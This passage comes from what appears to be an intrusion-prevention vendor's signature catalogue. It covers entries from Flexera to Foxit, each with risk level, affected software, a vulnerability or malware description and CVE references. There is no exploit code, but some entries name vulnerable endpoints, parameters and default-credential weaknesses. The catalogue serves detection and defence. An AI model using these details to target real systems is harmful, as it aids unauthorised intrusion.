Situation: Generic_CS-Flexera-Flexnet-Publisher-License-Server-Manager-Lmgrd-Stack-BOF
References:
BID-52718
http://www.securityfocus.com/bid/52718
Back to top

Flexera-InstallShield-ISGrid2.dll-DoFindReplace-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Flexera AdminStudio
Risk: Moderate
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Flexera AdminStudio; Flexera InstallShield; Novell ZENworks Configuration Management; Novell ZENworks AdminStudio
Type: Buffer Overflow
Description: Two heap buffer overflow vulnerabilities exist in Flexera Software InstallShield. Specifically, these vulnerabilities exist in the InstallShield Grid Control, ISGrid2.dll. The vulnerabilities are due to insufficient validation of the arguments of the DoFindReplace() method. Crafted long arguments can cause an overflow of heap buffers that could possibly lead to injection and execution of arbitrary code. A remote unauthenticated attacker can exploit these vulnerabilities by enticing a target user to open a malicious HTML page that uses the ActiveX Control ISGrid.Grid2. Successful exploitation can result in arbitrary code execution in the context of the currently logged-in user.
Situation: File-Text_Flexera-InstallShield-ISGrid2.dll-Heap-Buffer-Overflow
References:
CVE-2011-3174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3174
BID-50274
http://www.securityfocus.com/bid/50274
Back to top

Flexera-Multiple-Products-Isgrid.dll-ActiveX-Control-Code-Execution

About this vulnerability: A vulnerability in multiple products using Flexera ActiveX components
Risk: Moderate
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Flexera InstallShield; Novell ZENworks AdminStudio; Flexera AdminStudio
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in AdminStudio and InstallShield. Specifically, the vulnerability is due to insufficient validation by the DoFindReplace() function inside ISGrid.dll. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted web page. Successful exploitation can result in arbitrary code execution in the context of the currently logged-in user.
Situation: File-Text_Flexera-Multiple-Products-Isgrid.dll-ActiveX-Control-Code-Execution
Back to top

Flip4Mac-WMV-File-Parsing-Memory-Corruption

About this vulnerability: Memory Corruption vulnerability in Flip4Mac library for Apple Quicktime
Risk: Moderate
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: Apple QuickTime
Type: Insecure Configuration
Description: There is a memory corrution vulnerability in Flip4Mac library for Apple Quicktime. Specially crafted WMF file may cause memory corruption in a target computer.
Situation: File-Binary_Telestream-Flip4Mac-WMV-File-Parsing-Memory-Corruption
References:
CVE-2007-0466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0466
BID-22286
http://www.securityfocus.com/bid/22286
OSVDB-32697
http://www.osvdb.org/32697
Back to top

FLIR-AX8-Unauthenticated-RCE

About this vulnerability: A vulnerability in FLIR AX8 cameras.
Risk: High
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Platform: Linux; Unix
Software: FLIR
Type: Input Validation
Description: A vulnerability in FLIR AX8 thermal sensor cameras, versions 1.46.16 and before, which allow remote attackers to execute arbitrary code via the id parameter in an HTTP POST to res.php.
Situation: HTTP_CRL-FLIR-AX8-Unauthenticated-RCE
References:
CVE-2022-37061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37061
Back to top

Floodnet-IRC-Activity

About this vulnerability: Floodnet IRC Activity
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Floodnet is a IRC controlled bot.
Situation: Generic_SS-Floodnet-IRC-Activity
Back to top

Fluent-Bit-Memory-Corruption-CVE-2024-4323

About this vulnerability: A vulnerability in Fluent Bit
Risk: High
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Platform: Generic
Software: Fluent Bit
Type: Input Validation
Description: A memory corruption vulnerability has been reported in Fluent Bit versions 2.0.7 through 3.0.3. The vulnerability is due to insufficient validation of user-supplied input to the /api/v1/traces endpoint. Successful exploitation may lead to denial of service conditions, information disclosure, or remote code execution.
Situation: HTTP_CRL-Fluent-Bit-Memory-Corruption-CVE-2024-4323
References:
CVE-2024-4323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4323
Back to top

Fluentd-Oj-Parser-Insecure-Deserialization-CVE-2022-39379

About this vulnerability: A vulnerability in Fluentd parser
Risk: High
First detected in: sgpkg-ips-1538-5242
Last changed: sgpkg-ips-1538-5242
Platform: Generic
Software: Fluentd
Type: Input Validation
Description: Fluentd collects events from various data sources and writes them to files, RDBMS, NoSQL, IaaS, SaaS, Hadoop and so on. An insecure deserialization vulnerability in non-default configurations of Fluentd has been reported, which allows unauthenticated attackers to execute arbitrary code via specially crafted JSON payloads.
Situation: File-Text_Fluentd-Oj-Parser-Insecure-Deserialization-CVE-2022-39379
References:
CVE-2022-39379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39379
Back to top

FoggyWeb-Backdoor-C2-Traffic

About this vulnerability: FoggyWeb command and control traffic detected
Risk: High
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: FoggyWeb aims to exfiltrate information from compromised Active Directory Federation Services servers and may also download additional malicious components.
Situation: HTTP_CSU-FoggyWeb-Backdoor-C2-Traffic
Back to top

Forcepoint-SSLVPN-Password-Brute-Force

About this vulnerability: An attempt to perform password brute-force in Forcepoint VPN detected
Risk: High
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Platform: Generic
Software: Forcepoint VPN
Type: Failed Login
Description: This detects password brute-force or spray attacks against Forcepoint VPN. Such attacks could result in credential disclosure or denial-of-service.
Situation: Generic_SS-Forcepoint-SSLVPN-Authentication-Failure
Back to top

Foreign-Botnet

About this vulnerability: Foreign botnet
Risk: High
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Foreign is a malicious botnet that is primarily used to distribute and download further malicious modules. The deployment of these downloaded modules takes place without the user's consent. Among other malicious functionality, Foreign is known to record key strokes. As such, users of infected PCs should consider credentials for online services (such as social networks, web mailers, banks, etc.) compromised and change passwords after the threat has been removed.
Situation: HTTP_CRL_Foreign-Botnet-Traffic
HTTP_CSH-Foreign-Botnet-Traffic
Back to top

Foreman-Bookmarks-Creation-Remote-Code-Injection

About this vulnerability: A vulnerability in Foreman server licecycle management
Risk: Moderate
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Foreman
Type: Code Injection
Description: The bookmark creation function in some versions of Foreman server lifecycle management tool allows an authenticated attacker to inject and execute malicious code in the target system.
Situation: HTTP_CS-Foreman-Bookmarks-Creation-Remote-Code-Injection
References:
CVE-2013-2121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2121
OSVDB-94671
http://www.osvdb.org/94671
Back to top

ForgeRock-Access-Management-And-OpenAM-Jato-Insecure-Deserialization

About this vulnerability: A vulnerability in ForgeRock Access Management
Risk: Moderate
First detected in: sgpkg-ips-1372-5242
Last changed: sgpkg-ips-1372-5242
Platform: Generic
Software: ForgeRock OpenAM
Type: Input Validation
Description: Improper input validation by the Jato framework causes an insecure deserialization vulnerability in ForgeRock Access Management. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-ForgeRock-Access-Management-And-OpenAM-Jato-Insecure-Deserialization
References:
CVE-2021-35464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464
Back to top

ForgeRock-OpenAM-Jato-Java-Deserialization

About this vulnerability: A vulnerability in ForgeRock OpenAM.
Risk: High
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Platform: Unix; Linux
Software: ForgeRock OpenAM
Type: Input Validation
Description: A vulnerability in ForgeRock OpenAM, versions before 7.0 running Java 8, which allows remote attackers to execute arbitrary code through the ccversion endpoint, due to a serialization flaw in OpenAM's implementation of the Jato framework.
Situation: HTTP_CSU-ForgeRock-OpenAM-Jato-Java-Deserialization
References:
CVE-2021-35464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464
Back to top

Form-Pointed-To-Localhost

About this vulnerability: A HTML form with action argument pointing to localhost
Risk: Moderate
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: HTML form action pointing to localhost can indicate a malicious website trying to access resources hosted on the browsing computer. Common targets may be e.g. development databases hosted on development computers.
Situation: File-Text_HTML-Form-Pointed-To-Localhost
Back to top

Formbook-Malware-Infection-Traffic

About this vulnerability: Formbook malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1271-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Formbook malware infection traffic was detected.
Situation: HTTP_CS-Formbook-Malware-Infection-Traffic
Back to top

FortiGate-OS-Backdoor

About this vulnerability: A backdoor in FortiGate OS
Risk: High
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1296-5242
Platform: FortiGate OS
Software: <os>
Type: Backdoor
Description: There exists a backdoor in FortiGate OS.
Situation: SSH_FortiGate-OS-Backdoor-Access-Attempt
References:
CVE-2016-1909
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1909
Back to top

FortiLogger-Arbitrary-File-Upload-Exploit

About this vulnerability: A vulnerability in FortiLogger.
Risk: High
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Platform: Windows 10.0
Software: FortiLogger
Type: Input Validation
Description: A vulnerability in FortiLogger, versions before 5.2.0, which allows remote attackers to execute arbitrary code by uploading files via an insecure POST request to /Config/SaveUploadedHotspotLogoFile, due to the insufficient validation of file type.
Situation: HTTP_CS-FortiLogger-Arbitrary-File-Upload-Exploit
References:
CVE-2021-3378
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3378
Back to top

Fortinet-ForticlientEMS-SQL-Injection-CVE-2023-48788

About this vulnerability: A vulnerability in Fortinet FortiClientEMS
Risk: High
First detected in: sgpkg-ips-1708-5242
Last changed: sgpkg-ips-1708-5242
Platform: Generic
Software: FortiClientEMS
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Fortinet FortiClientEMS. An unauthenticated attacker may use this vulnerability to execute arbitrary commands.
Situation: Generic_CS-Fortinet-ForticlientEMS-SQL-Injection-CVE-2023-48788
References:
CVE-2023-48788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48788
Back to top

Fortinet-Fortimanager-Fgfmsd-Missing-Authentication-Command-Injection

About this vulnerability: A vulnerability in Fortinet FortiManager
Risk: Moderate
First detected in: sgpkg-ips-1806-5242
Last changed: sgpkg-ips-1806-5242
Platform: Generic
Software: Fortinet FortiManager
Type: Malfunction
Description: The lack of access control when handling client requests causes a command injection vulnerability in Fortinet FortiManager. A successful exploitation allows an attacker to execute arbitrary commands on the target system.
Situation: Generic_CS-Fortinet-Fortimanager-Fgfmsd-Missing-Authentication-Command-Injection
References:
CVE-2024-47575
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47575
Back to top

Fortinet-Fortinac-Arbitrary-File-Write-CVE-2022-39952

About this vulnerability: A vulnerability in Fortinet FortiNAC
Risk: High
First detected in: sgpkg-ips-1559-5242
Last changed: sgpkg-ips-1559-5242
Platform: Generic
Software: Fortinet FortiNAC
Type: Input Validation
Description: An arbitrary file write vulnerability has been reported in Fortinet FortiNAC. A successful exploit can allow an unauthenticated attacker to execute arbitrary code on the target system.
Situation: HTTP_CS-Fortinet-Fortinac-Arbitrary-File-Write-CVE-2022-39952
References:
CVE-2022-39952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39952
Back to top

Fortinet-FortiOS-Authentication-Bypass-CVE-2024-55591

About this vulnerability: A vulnerability in Fortinet FortiOS
Risk: High
First detected in: sgpkg-ips-1830-5242
Last changed: sgpkg-ips-1830-5242
Platform: FortiOS
Software: <os>
Type: Malfunction
Description: An authentication bypass vulnerability in FortiOS and FortiProxy allows a remote attacker to gain super-admin privileges.
Situation: HTTP_CSH-Fortinet-FortiOS-Authentication-Bypass-CVE-2024-55591
References:
CVE-2024-55591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55591
Back to top

Fortinet-FortiOS-Authorization-Bypass

About this vulnerability: A vulnerability in Fortinet FortiOS
Risk: High
First detected in: sgpkg-ips-1185-5242
Last changed: sgpkg-ips-1296-5242
Platform: FortiGate OS
Software: <os>
Type: Malfunction
Description: There exists an authorization bypass vulnerability in Fortinet FortiOS. Successful exploitation may allow an unauthenticated attacker to change password of an SSL VPN user.
Situation: HTTP_CRL-Fortinet-FortiOS-Authorization-Bypass
References:
CVE-2018-13382
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13382
Back to top

Fortinet-FortiOS-Format-String-CVE-2024-23113

About this vulnerability: A vulnerability in Fortinet FortiOS
Risk: High
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Platform: FortiOS
Software: <os>
Type: Format String
Description: A format string vulnerability in Fortinet FortiOS, FortiProxy, FortiPAM, and FortiSwitchManager allows an unauthenticated attacker to execute arbitrary commands.
Situation: Generic_CS-Fortinet-FortiOS-Format-String-CVE-2024-23113
References:
CVE-2024-23113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23113
Back to top

Fortinet-FortiOS-Heap-Buffer-Overflow-CVE-2018-13383

About this vulnerability: An attempt to exploit a vulnerability in FortiOS
Risk: Moderate
First detected in: sgpkg-ips-1426-5242
Last changed: sgpkg-ips-1426-5242
Platform: FortiOS
Software: <os>
Type: Buffer Overflow
Description: There exists a heap buffer overflow vulnerability in Fortinet FortiOS.
Situation: File-Text_Fortinet-FortiOS-Heap-Buffer-Overflow-CVE-2018-13383
References:
CVE-2018-13383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13383
Back to top

Fortinet-FortiOS-Out-Of-Bound-Write-CVE-2024-21762

About this vulnerability: An attempt to exploit a vulnerability in FortiOS detected
Risk: High
First detected in: sgpkg-ips-1821-5242
Last changed: sgpkg-ips-1821-5242
Platform: FortiOS
Software: <os>
Type: Input Validation
Description: A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or commands via specifically crafted requests.
Situation: HTTP_CCH-Maliciously-Large-Chunk-Size
References:
CVE-2024-21762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21762
Back to top

Fortinet-FortiOS-Path-Traversal-CVE-2018-13379

About this vulnerability: A vulnerability in Fortinet FortiOS
Risk: High
First detected in: sgpkg-ips-1304-5242
Last changed: sgpkg-ips-1304-5242
Platform: FortiOS
Software: <os>
Type: Input Validation
Description: There exists a path traversal vulnerability in Fortinet FortiOS. Successful exploitation may allow an unauthenticated attacker to download arbitrary system files, for example SSL VPN credentials, via crafted HTTP requests.
Situation: HTTP_CRL-Fortinet-FortiOS-Path-Traversal-CVE-2018-13379
References:
CVE-2018-13379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379
Back to top

Fortinet-Fortisiem-Command-Injection-CVE-2023-34992

About this vulnerability: A vulnerability in Fortinet FortiSIEM
Risk: High
First detected in: sgpkg-ips-1731-5242
Last changed: sgpkg-ips-1731-5242
Platform: Generic
Software: Fortinet FortiSIEM
Type: Input Validation
Description: An OS command injection vulnerability has been reported in Fortinet FortiSIEM. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary commands via crafted API requests.
Situation: Generic_CS-Fortinet-Fortisiem-Command-Injection-CVE-2023-34992
References:
CVE-2023-34992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34992
Back to top

Fortinet-Fortisiem-Command-Injection-CVE-2024-23108

About this vulnerability: A vulnerability in Fortinet FortiSIEM
Risk: High
First detected in: sgpkg-ips-1731-5242
Last changed: sgpkg-ips-1731-5242
Platform: Generic
Software: Fortinet FortiSIEM
Type: Input Validation
Description: An OS command injection vulnerability has been reported in Fortinet FortiSIEM. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary commands via crafted API requests.
Situation: Generic_CS-Fortinet-Fortisiem-Command-Injection-CVE-2024-23108
References:
CVE-2024-23108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23108
Back to top

Fortinet-Fortiweb-Cgi_Grpc_IDL_File_Post-Command-Injection-CVE-2024-50567

About this vulnerability: A vulnerability in Fortinet FortiWeb
Risk: Moderate
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Platform: Generic
Software: Fortinet FortiWeb
Type: Input Validation
Description: Insufficient validation of user input in the cgi_grpc_idl_file_post function causes a command execution vulnerability in Fortinet FortiWeb. A successful exploitation allows an attacker to execute arbitrary commands on the target system with root privileges.
Situation: HTTP_CS-Fortinet-Fortiweb-Cgi_Grpc_IDL_File_Post-Command-Injection-CVE-2024-50567
References:
CVE-2024-50567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50567
Back to top

Fortinet-Fortiweb-OS-Command-Injection

About this vulnerability: An attempt to exploit a vulnerability in Fortinet FortiWeb OS detected
Risk: High
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1381-5242
Platform: FortiOS
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Fortinet FortiWeb OS detected.
Situation: HTTP_CRL-Fortinet-Fortiweb-OS-Command-Injection
References:
CVE-2021-22123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22123
Back to top

Fortinet-Multiple-Products-Certificate-Import-Format-String-CVE-2024-45324

About this vulnerability: A vulnerability in Fortinet FortiOS
Risk: Moderate
First detected in: sgpkg-ips-1868-5242
Last changed: sgpkg-ips-1870-5242
Platform: Generic
Software: Fortinet FortiOS
Type: Format String
Description: Improper handling of certificate imports causes a vulnerability in multiple Fortinet products. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CS-Fortinet-Multiple-Products-Certificate-Import-Format-String-CVE-2024-45324
HTTP_CRL-Fortinet-Multiple-Products-Certificate-Import-Format-String-CVE-2024-45324
References:
CVE-2024-45324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45324
Back to top

Fortinet-Multiple-Products-Csfd-Directory-Traversal-CVE-2024-48884

About this vulnerability: A vulnerability in Fortinet FortiManager
Risk: Moderate
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Platform: Generic
Software: Fortinet FortiManager
Type: Input Validation
Description: Insufficient validation of security fabric hello packets in the csfd component causes a directory traversal vulnerability in multiple Fortinet products. A successful exploitation allows an attacker to delete arbitrary files on the target system and cause a denial of service condition.
Situation: Generic_CS-Fortinet-Multiple-Products-Csfd-Directory-Traversal-CVE-2024-48884
References:
CVE-2024-48884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48884
Back to top

Fortinet-Single-Sign-On-Hello-Message-Denial-Of-Service

About this vulnerability: A vulnerability in Fortinet Single Sign On
Risk: High
First detected in: sgpkg-ips-640-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Fortinet Single Sign On
Type: Integer Overflow
Description: A denial of service vulnerability exists in Fortinet Single Sign On (FSSO). The vulnerability is due to an integer overflow when calculating an address based on the size of a HELLO message. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted HELLO message to collectoragent.exe. Successful exploitation could lead to a denial of service condition.
Situation: Generic_CS-Fortinet-Single-Sign-On-Hello-Message-Denial-Of-Service
References:
CVE-2015-2281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2281
BID-73206
http://www.securityfocus.com/bid/73206
OSVDB-119719
http://www.osvdb.org/119719
Back to top

Fortinet-Single-Sign-On-Hello-Message-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Fortinet Single Sign On (FSSO)
Risk: High
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Fortinet Single Sign On
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Fortinet Single Sign On (FSSO). The vulnerability is due to a lack of adequate validation of user-supplied input when processing HELLO messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a specially crafted HELLO message to collectoragent.exe. Successful exploitation could lead to arbitrary code execution under the security context of the system user.
Situation: Generic_CS-Fortinet-Single-Sign-On-Hello-Message-Stack-Buffer-Overflow
References:
CVE-2015-2281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2281
BID-73206
http://www.securityfocus.com/bid/73206
OSVDB-119719
http://www.osvdb.org/119719
Back to top

FortiOS-And-FortiProxy-SSLVPN-Heap-Buffer-Overflow-CVE-2023-27997

About this vulnerability: An attempt to exploit a vulnerability in FortiOS detected
Risk: High
First detected in: sgpkg-ips-1601-5242
Last changed: sgpkg-ips-1601-5242
Platform: FortiOS
Software: <os>
Type: Heap Overflow
Description: A heap-based buffer overflow vulnerability in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.
Situation: HTTP_CRL-FortiOS-And-FortiProxy-SSLVPN-Heap-Buffer-Overflow-CVE-2023-27997
References:
CVE-2023-27997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27997
Back to top

FortiOS-Authentication-Bypass-CVE-2022-40684

About this vulnerability: A vulnerability in FortiOS
Risk: High
First detected in: sgpkg-ips-1514-5242
Last changed: sgpkg-ips-1514-5242
Platform: FortiOS
Software: <os>
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in FortiOS, FortiProxy, and FortiSwitchManager.
Situation: HTTP_CSH-FortiOS-Authentication-Bypass-CVE-2022-40684
References:
CVE-2022-40684
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
Back to top

FortiOS-Ssl-VPN-Heap-Buffer-Overflow-CVE-2022-42475

About this vulnerability: An attempt to exploit a vulnerability in FortiOS detected
Risk: High
First detected in: sgpkg-ips-1568-5242
Last changed: sgpkg-ips-1568-5242
Platform: Generic
Software: FortiOS
Type: Heap Overflow
Description: Multiple versions of Fortinet FortiOS SSL-VPN contain a heap-based buffer overflow vulnerability which can allow an unauthenticated, remote attacker to execute arbitrary code or commands via specifically crafted requests.
Situation: HTTP_CSH_FortiOS-Ssl-VPN-Heap-Buffer-Overflow-CVE-2022-42475
References:
CVE-2022-42475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42475
Back to top

Fortra-FileCatalyst-Workflow-HSQLDB-Default-Credentials-CVE-2024-6633

About this vulnerability: A vulnerability in Fortra FileCatalyst Workflow
Risk: High
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Platform: Generic
Software: Fortra FileCatalyst Workflow
Type: Insecure Configuration
Description: Fortra FileCatalyst Workflow 5.1.6 build 139 and earlier contain publicly disclosed default HSQL database credentials. If a vulnerable version of the FileCatalyst Workflow hasn't been configured to use an alternative database, unauthenticated remote attackers can use these default credentials to access the HSQL database.
Situation: Generic_CS-Fortra-FileCatalyst-Workflow-HSQLDB-Default-Credentials-CVE-2024-6633
References:
CVE-2024-6633
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6633
Back to top

Fortra-FileCatalyst-Workflow-SQL-Injection-CVE-2024-5276

About this vulnerability: An attempt to exploit a vulnerability in Fortra FileCatalyst detected
Risk: High
First detected in: sgpkg-ips-1745-5242
Last changed: sgpkg-ips-1745-5242
Platform: Generic
Software: Fortra FileCatalyst Workflow
Type: Input Validation
Description: A SQL injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data. The likely impacts include creation of administrative users and deletion or modification of data in the application database. Data exfiltration via SQL injection is not possible using this vulnerability. Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled, otherwise an authenticated user is required. This issue affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.
Situation: HTTP_CRL-Fortra-FileCatalyst-Workflow-SQL-Injection-CVE-2024-5276
References:
CVE-2024-5276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5276
Back to top

Four-Faith-Routers-F3x24-F3x36-Remote-Command-Injection-CVE-2024-12856

About this vulnerability: An attempt to exploit a vulnerability in Four-Faith router detected
Risk: High
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Platform: Generic
Software: Four-Faith Router
Type: Input Validation
Description: The Four-Faith router models F3x24 and F3x36 are affected by an operating system (OS) command injection vulnerability. At least firmware version 2.0 allows authenticated and remote attackers to execute arbitrary OS commands over HTTP when modifying the system time via "apply.cgi". Additionally, this firmware version has default credentials which, if not changed, would effectively change this vulnerability into an unauthenticated and remote OS command execution issue.
Situation: HTTP_CRL-Four-Faith-Routers-F3x24-F3x36-Remote-Command-Injection-CVE-2024-12856
References:
CVE-2024-12856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12856
Back to top

Foxit-Multiple-Products-PNG-To-PDF-Conversion-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Foxit Software Enterprise Reader
Risk: Moderate
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in Foxit Reader. The vulnerability exists in ConvertToPDF_x86.dll and is due to improper bound checking on tEXt chunk when converting a PNG file to PDF file. A remote unauthenticated attacker can leverage this to overflow a buffer. Successful exploitation would result in execution of arbitrary code in the security context of the target user.
Situation: File-PNG_Foxit-Multiple-Products-PNG-To-PDF-Conversion-Heap-Buffer-Overflow
Back to top

Foxit-PDF-Reader-And-Editor-Annotation-CVE-2021-34850-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software PDF Editor
Risk: Moderate
First detected in: sgpkg-ips-1402-5242
Last changed: sgpkg-ips-1402-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: There exists a use-after-free vulnerability in Foxit PDF Reader and Editor. Successful exploitation could lead in arbitrary code execution.
Situation: File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-CVE-2021-34850-Use-After-Free
References:
CVE-2021-34850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34850
Back to top

Foxit-PDF-Reader-And-Editor-Annotation-Rect-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software PDF Editor
Risk: Moderate
First detected in: sgpkg-ips-1402-5242
Last changed: sgpkg-ips-1402-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: There exists a use-after-free vulnerability in Foxit PDF Reader and Editor. Successful exploitation could lead in arbitrary code execution.
Situation: File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-Rect-Use-After-Free
References:
CVE-2021-34842
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34842
Back to top

Foxit-PDF-Reader-And-Editor-Annotation-Richdefaults-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software PDF Editor
Risk: Moderate
First detected in: sgpkg-ips-1397-5242
Last changed: sgpkg-ips-1397-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: There exists a use-after-free vulnerability in Foxit PDF Reader and Editor. Successful exploitation could lead in arbitrary code execution.
Situation: File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-Richdefaults-Use-After-Free
References:
CVE-2021-34848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34848
Back to top

Foxit-PDF-Reader-And-Editor-Annotation-Rotate-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software PDF Editor
Risk: Moderate
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: There exists a use-after-free vulnerability in Foxit PDF Reader and Editor. Successful exploitation could lead in arbitrary code execution.
Situation: File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-Rotate-Use-After-Free
References:
CVE-2021-34847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34847
Back to top

Foxit-PDF-Reader-And-Editor-Exportxfadata-Handling-Remote-Code-Execution

About this vulnerability: A vulnerability in Foxit Software PDF Reader and Editor
Risk: High
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Foxit PDF Reader and Editor. This vulnerability is due to improper handling of the exportXFAData method. A remote attacker could exploit this vulnerability by enticing a victim user to visit a malicious web page or open a crafted PDF document. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user.
Situation: File-PDF_Foxit-PDF-Reader-And-Editor-Exportxfadata-Handling-Remote-Code-Execution
References:
CVE-2023-27363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27363
Back to top

Foxit-PDF-Reader-JavaScript-Xfa-User-After-Free

About this vulnerability: A vulnerability in Foxit Software PDF Reader
Risk: Moderate
First detected in: sgpkg-ips-1518-5242
Last changed: sgpkg-ips-1518-5242
Platform: Generic
